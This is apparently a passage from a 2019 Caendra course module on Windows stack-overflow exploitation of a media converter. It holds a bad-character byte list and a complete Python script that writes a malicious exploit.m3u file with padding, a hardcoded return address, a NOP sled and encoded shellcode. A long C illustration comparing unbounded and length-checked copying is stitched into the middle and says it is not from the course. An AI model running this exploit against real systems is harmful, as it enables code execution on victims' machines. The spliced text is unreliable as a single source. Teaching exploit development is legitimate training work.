Section 02 | Module 01
© Caendra Inc. 2019
All Rights Reserved
Table of Contents
Windows Stack Overflow
Windows Basic Overflow Analysis
Now, let’s run the Python script. The “exploit.m3u” file will appear.
Drag and drop the newly created exploit m3u file onto the converter and check in the debugger what happens.
Unfortunately, no.
void process_user_data(const char *user_input) {
    const char *tmp = user_input;
    char *sanitized_input = sanitize(tmp);          // remove all non-printable characters
    strcpy(application_memory, sanitized_input);    // unbounded copy: the overflow happens here
}
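The pseudocode above is the pattern that matters for both sides: the sanitizer rewrites the input (here, dropping every non-printable byte) before an unbounded strcpy copies it into a fixed-size destination. The C below is an added illustration, not code from the course or the target application. It shows that sanitize-then-copy flow with the unbounded copy beside a bounded one that checks the input length against the destination before copying. APP_BUF_SIZE, the function names and the sample input are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

/* Added illustration, not code from the course: the sanitize-then-copy
 * pattern of the pseudocode above, once with the unbounded strcpy and once
 * with an explicit size check. APP_BUF_SIZE and the function names are
 * assumed for this example. */
#define APP_BUF_SIZE 64

/* Copy only printable ASCII (0x20..0x7e) from src to dst, as the pseudocode's
 * "remove all non-printable characters" comment describes. Tab, LF and CR are
 * therefore dropped too. Writes at most dst_cap-1 bytes plus a terminator and
 * returns the number of bytes kept. */
size_t sanitize(const char *src, size_t src_len, char *dst, size_t dst_cap)
{
    size_t n = 0;
    for (size_t i = 0; i < src_len && n + 1 < dst_cap; i++) {
        unsigned char c = (unsigned char)src[i];
        if (c >= 0x20 && c <= 0x7e)
            dst[n++] = (char)c;
    }
    if (dst_cap > 0)
        dst[n] = '\0';
    return n;
}

/* Vulnerable form (mirrors the pseudocode): the sanitized length is never
 * compared with the destination size, so more than APP_BUF_SIZE-1 printable
 * bytes overrun app_mem. Shown for contrast only; it is not called below. */
void process_user_data_vulnerable(const char *user_input, char app_mem[APP_BUF_SIZE])
{
    char sanitized_input[4096];
    sanitize(user_input, strlen(user_input), sanitized_input, sizeof sanitized_input);
    strcpy(app_mem, sanitized_input);   /* unbounded copy: the overflow happens here */
}

/* Hardened form: reject input that cannot fit, then sanitize straight into
 * the bounded destination. Because sanitize never makes data longer, checking
 * the raw length against app_cap is sufficient. Returns bytes stored or -1. */
int process_user_data_safe(const char *user_input, size_t len, char *app_mem, size_t app_cap)
{
    if (app_cap == 0 || len >= app_cap)
        return -1;
    return (int)sanitize(user_input, len, app_mem, app_cap);
}

/* Constructed sample input: letters interleaved with tab, LF, CR and 0x01.
 * Adjacent literals keep the hex escapes from swallowing the next letter. */
static const char SAMPLE[] = "AB\x09" "CD\x0a" "EF\x0d" "GH\x01" "IJ";
#define SAMPLE_LEN (sizeof SAMPLE - 1)

/* Only the ten letters survive sanitisation. */
int demo_sanitized_length(void)
{
    char out[APP_BUF_SIZE];
    return (int)sanitize(SAMPLE, SAMPLE_LEN, out, sizeof out);
}

/* Sample fits: returns 10 and app_mem holds "ABCDEFGHIJ" (else -2). */
int demo_fits_accepted(void)
{
    char app_mem[APP_BUF_SIZE];
    int n = process_user_data_safe(SAMPLE, SAMPLE_LEN, app_mem, sizeof app_mem);
    if (n < 0 || strcmp(app_mem, "ABCDEFGHIJ") != 0)
        return -2;
    return n;
}

/* 200 bytes of 'A' cannot fit a 64-byte destination: rejected with -1
 * instead of overrunning the buffer as the vulnerable form would. */
int demo_overlong_rejected(void)
{
    char input[200];
    char app_mem[APP_BUF_SIZE];
    memset(input, 'A', sizeof input);
    return process_user_data_safe(input, sizeof input, app_mem, sizeof app_mem);
}

int main(void)
{
    printf("sanitized length: %d\n", demo_sanitized_length());
    printf("fits accepted:    %d\n", demo_fits_accepted());
    printf("overlong result:  %d\n", demo_overlong_rejected());
    return 0;
}
```

Two points follow from the sample run. First, the sanitizer changes the byte stream before the copy, which is exactly why bytes outside the printable range behave as bad characters in the analysis that follows. Second, the fix is not a better sanitizer but a length check made against the real destination size before any copy; with that check in place, oversized input is refused rather than written past the buffer.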
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
Let’s restore 0x09 and remove CRLF (the 0x0a and 0x0d bytes) from the ASCII buffer. Then, we’ll generate a new file, restart the application, reattach the debugger, and run the exploit file.
XDSv1: Section 2, Module 1 - Caendra Inc. © 2019 | p.62
1.2.4.2 Basic Overflow – Common Bad Characters
buffer = "http://"
shellcode = ("\xda\xd7\xbd\x3e\x3b\xf9\x36\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
"\x31\x31\x68\x18\x03\x68\x18\x83\xc0\x3a\xd9\x0c\xca\xaa\x9f"
"\xef\x33\x2a\xc0\x66\xd6\x1b\xc0\x1d\x92\x0b\xf0\x56\xf6\xa7"
"\x7b\x3a\xe3\x3c\x09\x93\x04\xf5\xa4\xc5\x2b\x06\x94\x36\x2d"
"\x84\xe7\x6a\x8d\xb5\x27\x7f\xcc\xf2\x5a\x72\x9c\xab\x11\x21"
"\x31\xd8\x6c\xfa\xba\x92\x61\x7a\x5e\x62\x83\xab\xf1\xf9\xda"
"\x6b\xf3\x2e\x57\x22\xeb\x33\x52\xfc\x80\x87\x28\xff\x40\xd6"
"\xd1\xac\xac\xd7\x23\xac\xe9\xdf\xdb\xdb\x03\x1c\x61\xdc\xd7"
"\x5f\xbd\x69\xcc\xc7\x36\xc9\x28\xf6\x9b\x8c\xbb\xf4\x50\xda"
"\xe4\x18\x66\x0f\x9f\x24\xe3\xae\x70\xad\xb7\x94\x54\xf6\x6c"
"\xb4\xcd\x52\xc2\xc9\x0e\x3d\xbb\x6f\x44\xd3\xa8\x1d\x07\xb9"
"\x2f\x93\x3d\x8f\x30\xab\x3d\xbf\x58\x9a\xb6\x50\x1e\x23\x1d"
"\x15\xd0\x69\x3c\x3f\x79\x34\xd4\x02\xe4\xc7\x02\x40\x11\x44"
"\xa7\x38\xe6\x54\xc2\x3d\xa2\xd2\x3e\x4f\xbb\xb6\x40\xfc\xbc"
"\x92\x22\x63\x2f\x7e\x8b\x06\xd7\xe5\xd3")
buffer += "A"*17417
buffer += "\x6e\x9d\x92\x55"
buffer += "\x90"*50
buffer += shellcode
buffer += "C"*(600-len(shellcode))
f = open("exploit.m3u", "w")
f.write(buffer)
f.close()
*Labs are only available in Full or Elite Editions of the course. To access, go to the course in your members area and click the labs drop-down in the appropriate module line or to the virtual labs tabs on the left navigation. To upgrade, click LINK.